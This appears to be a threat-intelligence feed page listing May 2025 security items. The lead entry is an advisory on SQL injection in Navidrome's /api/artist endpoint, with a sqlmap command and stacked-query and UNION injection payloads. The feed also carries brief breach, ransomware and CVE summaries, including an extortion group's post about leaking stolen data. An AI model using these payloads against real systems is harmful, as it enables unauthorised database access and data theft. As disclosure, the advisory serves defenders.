CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
đ¨ Marked as known exploited on May 29th, 2025 (17 days ago).
Description: đĄ Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2
Overview
This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.
Details
Vulnerable Component:
API endpoint â /api/artist
Parameter â role
Vulnerability Type:
SQL Injection (stacked queries, UNION queries)
Database Affected:
SQLite (confirmed exploitation via SQLite-specific payloads)
Impact:
Successful exploitation allows an unauthenticated attacker to:
Execute arbitrary SQL commands
Extract or manipulate sensitive data (e.g., user records, playlists)
Potentially escalate privileges or disrupt service availability
Proof of Concept (PoC)
Example Exploit Command:
sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite
Sample Payloads:
Stacked Queries:
http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--
UNION-Based Query:
http://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,...
May 29th, 2025 (17 days ago)
|
|
Description: Alleged data breach of Comando General de las Fuerzas Militares (cgfm.mil.co)
May 29th, 2025 (18 days ago)
|
|
Description: While the botnet may not be completely automated, it uses certain tactics when targeting devices that indicate that it may, at the very least, be semiautomated.
May 29th, 2025 (18 days ago)
|
|
Description: The sheriff said the woman self-administered the abortion and her family were concerned for her safety, so authorities searched through Flock cameras. Experts are still concerned that a cop in a state where abortion is illegal can search cameras in others where it's a human right.
May 29th, 2025 (18 days ago)
|
CVE-2024-51392 |
Description: An issue in OpenKnowledgeMaps Headstart v7 allows a remote attacker to escalate privileges via the url parameter of the getPDF.php component
EPSS Score: 0.11%
May 29th, 2025 (18 days ago)
|
|
Description: McKenzie Commercial delivers high-quality, cost-effective commerc
ial construction services, while fostering a supportive work envi
ronment for employees who provide exceptional workmanship.
We are going to upload about 42 GB of corporate data. Employee pe
rsonal information (DOB, passports, addresses, phones, emails, an
d so on), financial data, client data, lots of project data, cont
racts and agreements, confidential documents, NDAs, etc.
May 29th, 2025 (18 days ago)
|
|
Description: Alleged sale of unauthorized admin access to three Romanian online shops
May 29th, 2025 (18 days ago)
|
|
Description: Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero.
"CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan
May 29th, 2025 (18 days ago)
|
|
Description: Funnull Technology supports âhundreds of thousands of websitesâ dedicated to the scams, otherwise known as pig butchering, according to the sanctions announcement by the Treasury Departmentâs Office of Foreign Assets Control.
May 29th, 2025 (18 days ago)
|
|
CVE-2025-45474 |
Description: maccms10 v2025.1000.4047 is vulnerable to Server-side request forgery (SSRF) in Email Settings.
EPSS Score: 0.05% SSVC Exploitation: poc
May 29th, 2025 (18 days ago)
|